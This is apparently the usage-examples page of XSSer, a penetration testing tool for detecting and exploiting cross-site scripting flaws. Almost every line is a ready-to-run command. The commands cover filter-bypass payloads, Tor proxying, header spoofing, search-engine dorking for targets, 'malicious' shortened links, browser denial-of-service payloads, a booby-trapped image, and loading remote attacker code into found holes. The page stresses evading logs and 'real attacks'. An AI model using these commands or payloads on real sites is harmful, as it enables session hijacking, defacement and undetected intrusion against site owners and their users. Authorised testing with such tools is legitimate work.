Cross Site “Scripter” (aka XSSer) is an automatic -framework- to:
● Detect XSS flaws in web-based aplications.
● Exploit -local/remote- code “on wild”.
● Report founded vulnerabilities in real time to community.
● XSS flaws occur whenever an application takes untrusted data
and sends it to a web browser without proper validation and escaping.
● XSS allows attackers to execute scripts in the victim’s browser
which can hijack user sessions, deface web sites, or redirect the user to
malicious sites.

A penetration testing tool for detecting and exploiting XSS vulnerabilites.

Website | Group | Presentation | Download | Twitter

Examples:

If you have interesting examples of usage about XSSer, please send an email to the mailing list.

——————-

* Simple injection from URL:
[cc lang=”bash”]$ python xsser.py -u “http://host.com”[/cc]
——————-

* Simple injection from File, with tor proxy and spoofing HTTP Referer headers:

[cc lang=”bash”]$ python xsser.py -i “file.txt” –proxy “http://127.0.0.1:8118” –referer “666.666.666.666”[/cc]

——————-

* Multiple injections from URL, with automatic payloading, using tor proxy, injecting on payloads character encoding in “Hexadecimal”, with verbose output and saving results to file (XSSlist.dat):

[cc lang=”bash”]$ python xsser.py -u “http://host.com” –proxy “http://127.0.0.1:8118” –auto –Hex –verbose -w[/cc]

——————-

* Multiple injections from URL, with automatic payloading, using caracter encoding mutations (first, change payload to hexadecimal; second, change to StringFromCharCode the first encoding; third, reencode to Hexadecimal the second encoding), with HTTP User-Agent spoofed, changing timeout to “20” and using multithreads (5 threads):

[cc lang=”bash”]$ python xsser.py -u “http://host.com” –auto –Cem “Hex,Str,Hex” –user-agent “XSSer!!” –timeout “20” –threads “5”[/cc]

——————-

* Advance injection from File, payloading your -own- payload and using Unescape() character encoding to bypass filters:

[cc lang=”bash”]$ python xsser.py -i “urls.txt” –payload ‘a=”get”;b=”URL(“”;c=”javascript:”;d=”alert(‘XSS’);”)”;eval(a+b+c+d);’ –Une[/cc]

——————-

* Injection from Dork selecting “duck” engine (XSSer Storm!):

[cc lang=”bash”]$ python xsser.py –De “duck” -d “search.php?”[/cc]

——————-

* Injection from Crawler with deep 3 and 4 pages to see (XSSer Spider!):

[cc lang=”bash”]$ python xsser.py -c3 –Cw=4 -u “http://host.com”[/cc]

——————-

* Simple injection from URL, using POST, with statistics results:

[cc lang=”bash”]$ python xsser.py -u “http://host.com” -p “index.php?target=search&subtarget=top&searchstring=” -s[/cc]

——————-

* Multiple injections from URL to a parameter sending with GET, using automatic payloading, with IP Octal payloading ofuscation and printering results in a “tinyurl” shortered link (ready for share!):

[cc lang=”bash”]$ python xsser.py -u “http://host.com” -g “bs/?q=” –auto –Doo –short tinyurl[/cc]

——————-

* Simple injection from URL, using GET, injecting a vector in Cookie parameter, trying to use a DOM shadow space (no server logging!) and if exists any “hole”, applying your manual final payload “malicious” code (ready for real attacks!):

[cc lang=”bash”]$ python xsser.py -u “http://host.com” -g “bs/?q=” –Coo –Dom –Fr=”!enter your final injection code here!”[/cc]

——————-

* Simple injection from URL, using GET and trying to generate with results a “malicious” shortered link (is.gd) with a valid DoS (Denegation Of Service) browser client payload:

[cc lang=”bash”]$ python xsser.py -u “http://host.com” -g “bs/?q=” –Dos –short “is.gd”[/cc]

——————-

* Multiple injections to multiple places, extracting targets from a list in a FILE, applying automatic payloading, changing timeout to “20” and using multithreads (5 threads), increasing delay between petitions to 10 seconds, injecting parameters in HTTP USer-Agent, HTTP Referer and in Cookie parameters, using proxy Tor, with IP Octal ofuscation, with statistics results, in verbose mode and creating shortered links (tinyurl) of any valid injecting payloads found. (real playing mode!):

[cc lang=”bash”]$ python xsser.py -i “list_of_url_targets.txt” –auto –timeout “20” –threads “5” –delay “10” –Xsa –Xsr –Coo –proxy “http://127.0.0.1:8118” –Doo -s –verbose –Dos –short “tinyurl”[/cc]

——————-

* Injection of user XSS vector directly in a malicious -fake- image created “on the wild”, and ready to be uploaded.

[cc lang=”bash”]$ python xsser.py –Imx “test.png” –payload “!enter your malicious injection code here!”[/cc]

——————-

* Report output ‘positives’ injections of a dorking search (using “ask” dorker) directly to a XML file.

[cc lang=”bash”]$ python xsser.py -d “login.php” –De “ask” –xml “security_report_XSSer_Dork_cuil.xml”[/cc]

——————-

* Publish output ‘positives’ injections of a dorking search (using “duck” dorker) directly to http://identi.ca

(federated XSS pentesting botnet)

[cc lang=”bash”]$ python xsser.py -d “login.php” –De “duck” –publish[/cc]

* Examples online:

– http://identi.ca/xsserbot01

– http://twitter.com/xsserbot01

——————-

* Create a .swf movie with XSS code injected

[cc lang=”bash”]$ python xsser.py –fla “name_of_file”[/cc]

——————-

* Send a pre-checking hash to see if target will generate -false positive- results

$ python xsser.py -u “host.com” –hash

——————-

* Multiple fuzzing injections from url, including DCP injections and exploiting our “own” code, spoofed in a shortered link, on positive results founded. XSS real-time exploiting.

[cc lang=”bash”]$ python xsser.py -u “host.com” –auto –Dcp –Fp “enter_your_code_here” –short “is.gd”[/cc]

——————-

* Exploiting Base64 code encoding in META tag (rfc2397) in a manual payload of a vulnerable target.

[cc lang=”bash”]$ python xsser.py -u “host.com” -g “vulnerable_path” –payload “valid_vector_injected” –B64[/cc]

——————-

* Exploiting our “own” -remote code- in a payload discovered using fuzzing and launch it in a browser directly

[cc lang=”bash”]$ python xsser.py -u “host.com” -g “vulnerable_path” –auto –Fr “my_host/path/code.js” –launch[/cc]